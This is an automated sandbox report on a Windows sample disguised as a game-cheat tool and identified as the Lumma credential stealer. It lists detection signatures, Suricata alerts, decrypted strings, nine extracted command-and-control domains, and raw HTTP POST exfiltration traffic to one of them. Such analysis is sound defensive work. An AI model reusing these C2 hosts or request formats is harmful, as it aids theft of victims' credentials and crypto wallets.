Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MilkaCheats.exe

Overview

General Information

Sample name:MilkaCheats.exe
Analysis ID:1543311
MD5:906c60b268404ecda308e2692a3aaaf8
SHA1:e5405c09314a48cf035806f1b0a4cddd89df04d5
SHA256:91a240e27b2849592fea2a6f326afedfc77c60d480126f5f9c57653a889b3dcf
Tags:exeuser-4k95m
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • MilkaCheats.exe (PID: 6232 cmdline: "C:\Users\user\Desktop\MilkaCheats.exe" MD5: 906C60B268404ECDA308E2692A3AAAF8)
    • MilkaCheats.exe (PID: 6428 cmdline: "C:\Users\user\Desktop\MilkaCheats.exe" MD5: 906C60B268404ECDA308E2692A3AAAF8)
    • WerFault.exe (PID: 4584 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6232 -s 232 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["presticitpo.store", "messejawu.store", "founpiuer.store", "scriptyprefej.store", "crisiwarny.store", "necklacedmny.store", "fadehairucw.store", "thumbystriw.store", "navygenerayk.store"], "Build id": "yau6Na--5574340625"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000003.1726270504.0000000001342000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000003.1768149959.0000000001342000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: MilkaCheats.exe PID: 6428JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: MilkaCheats.exe PID: 6428JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: MilkaCheats.exe PID: 6428JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              Click to see the 1 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-27T16:44:59.376608+010020546531A Network Trojan was detected192.168.2.449730172.67.170.64443TCP
              2024-10-27T16:45:01.669879+010020546531A Network Trojan was detected192.168.2.449732172.67.170.64443TCP
              2024-10-27T16:45:15.310166+010020546531A Network Trojan was detected192.168.2.449748172.67.170.64443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-27T16:44:59.376608+010020498361A Network Trojan was detected192.168.2.449730172.67.170.64443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-27T16:45:01.669879+010020498121A Network Trojan was detected192.168.2.449732172.67.170.64443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-27T16:45:09.623341+010020480941Malware Command and Control Activity Detected192.168.2.449741172.67.170.64443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-27T16:45:10.787252+010028438641A Network Trojan was detected192.168.2.449743172.67.170.64443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: MilkaCheats.exeAvira: detected
              Source: 1.2.MilkaCheats.exe.400000.1.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["presticitpo.store", "messejawu.store", "founpiuer.store", "scriptyprefej.store", "crisiwarny.store", "necklacedmny.store", "fadehairucw.store", "thumbystriw.store", "navygenerayk.store"], "Build id": "yau6Na--5574340625"}
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.1% probability
              Source: MilkaCheats.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: scriptyprefej.store
              Source: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: navygenerayk.store
              Source: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: founpiuer.store
              Source: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: necklacedmny.store
              Source: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: thumbystriw.store
              Source: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: fadehairucw.store
              Source: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: crisiwarny.store
              Source: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: messejawu.store
              Source: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: yau6Na--5574340625
              Source: MilkaCheats.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: MilkaCheats.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000DB239 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_000DB239
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolderJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+6D44C02Ch]0_2_0012E0A0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov word ptr [ebp+edx*4+00h], ax0_2_000FA160
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+34h]0_2_000FA160
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then jmp ecx0_2_000FFAF3
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov word ptr [edx], bp0_2_001102D5
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov word ptr [ecx], di0_2_001102D5
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov esi, ecx0_2_001302DC
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov dword ptr [esi+10h], edx0_2_0011E2E9
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0011E2E9
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0011E2E9
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov edi, esi0_2_0012A31A
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]0_2_0013231D
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then add ecx, eax0_2_00118493
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-6Ch]0_2_00118493
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx+38h]0_2_0010C56B
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov ecx, dword ptr [0044DCFCh]0_2_0012A590
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov ecx, dword ptr [0044DCFCh]0_2_0012A582
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov dword ptr [esi+10h], edx0_2_0011E5F3
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0011E5F3
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0011E5F3
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then jmp eax0_2_0012C638
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then jmp ecx0_2_00116672
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_001307A6
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov ebp, edx0_2_001308F0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+58h]0_2_00110930
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-42h]0_2_000FCA12
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h0_2_00114AF0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0011CBC0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax-3ED06EDAh]0_2_0012AC12
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], B62B8D10h0_2_0011AC52
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_0011EC6A
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_0011ECA6
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov word ptr [eax], cx0_2_000FCD19
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00114D50
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+6D44C030h]0_2_00118F30
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9ABDB589h0_2_00118F30
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then and esi, 001FF800h0_2_000F2FB0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+75E07B5Ch]0_2_000FD030
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_00133050
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00127090
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h0_2_0011D0F0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then jmp edx0_2_000F7398
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0000008Ah]0_2_000FB3A0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov dword ptr [eax+ebx], 30303030h0_2_000EF410
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov dword ptr [eax+ebx], 20202020h0_2_000EF410
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]0_2_0012D430
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov esi, dword ptr [esp+1Ch]0_2_0012D430
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov edx, eax0_2_001154F7
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+29352E8Dh]0_2_00133740
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then jmp ecx0_2_000FF8AF
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov edx, dword ptr [esp+04h]0_2_000EF8B8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax]0_2_00111AF7
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then jmp ecx0_2_000FFAF8
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_0011DB4A
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], B62B8D10h0_2_0011BB8B
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov ebx, dword ptr [esp]0_2_0011BB8B
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov edx, dword ptr [esi+64h]0_2_0011FB8C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov edx, dword ptr [esi+64h]0_2_0011FBC9
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_000F3CA0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then add edx, esi0_2_00117D02
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov edx, eax0_2_001154F7
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov ecx, eax0_2_0011DDE0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then jmp ecx0_2_00131E36
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 4x nop then mov dword ptr [esp+04h], ecx0_2_0010DFB0

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.170.64:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.170.64:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 172.67.170.64:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 172.67.170.64:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49741 -> 172.67.170.64:443
              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49743 -> 172.67.170.64:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 172.67.170.64:443
              Source: Malware configuration extractorURLs: presticitpo.store
              Source: Malware configuration extractorURLs: messejawu.store
              Source: Malware configuration extractorURLs: founpiuer.store
              Source: Malware configuration extractorURLs: scriptyprefej.store
              Source: Malware configuration extractorURLs: crisiwarny.store
              Source: Malware configuration extractorURLs: necklacedmny.store
              Source: Malware configuration extractorURLs: fadehairucw.store
              Source: Malware configuration extractorURLs: thumbystriw.store
              Source: Malware configuration extractorURLs: navygenerayk.store
              Source: Joe Sandbox ViewIP Address: 172.67.170.64 172.67.170.64
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18168Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8789Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20442Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1288Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584404Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: crisiwarny.store
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: messejawu.store
              Source: global trafficDNS traffic detected: DNS query: presticitpo.store
              Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
              Source: MilkaCheats.exe, 00000001.00000003.1750036260.0000000003A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: MilkaCheats.exe, 00000001.00000003.1750036260.0000000003A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: MilkaCheats.exe, 00000001.00000003.1750036260.0000000003A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: MilkaCheats.exe, 00000001.00000003.1750036260.0000000003A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: MilkaCheats.exe, 00000001.00000003.1750036260.0000000003A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: MilkaCheats.exe, 00000001.00000003.1750036260.0000000003A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: MilkaCheats.exe, 00000001.00000003.1750036260.0000000003A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: MilkaCheats.exe, 00000001.00000003.1750036260.0000000003A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: MilkaCheats.exe, 00000001.00000003.1750036260.0000000003A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
              Source: MilkaCheats.exe, 00000001.00000003.1750036260.0000000003A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: MilkaCheats.exe, 00000001.00000003.1750036260.0000000003A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: MilkaCheats.exe, 00000001.00000003.1751292403.000000000136A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: MilkaCheats.exe, 00000001.00000003.1751292403.000000000136A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: MilkaCheats.exe, 00000001.00000003.1751292403.000000000136A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: MilkaCheats.exe, 00000001.00000003.1751292403.000000000136A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: MilkaCheats.exe, 00000001.00000003.1847565217.00000000012E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/
              Source: MilkaCheats.exe, 00000001.00000003.1802442318.000000000136C000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1835884206.000000000136C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/Bm
              Source: MilkaCheats.exe, 00000001.00000002.1848284074.00000000012E4000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1847565217.00000000012E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/O
              Source: MilkaCheats.exe, 00000001.00000003.1726270504.0000000001342000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000002.1848510788.0000000001342000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1794237386.0000000001342000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1802070009.0000000001342000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1847565217.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1847716961.0000000001342000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000002.1848584862.0000000001361000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/api
              Source: MilkaCheats.exe, 00000001.00000003.1847808450.0000000001361000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1802215575.0000000001361000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000002.1848584862.0000000001361000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/apihCb
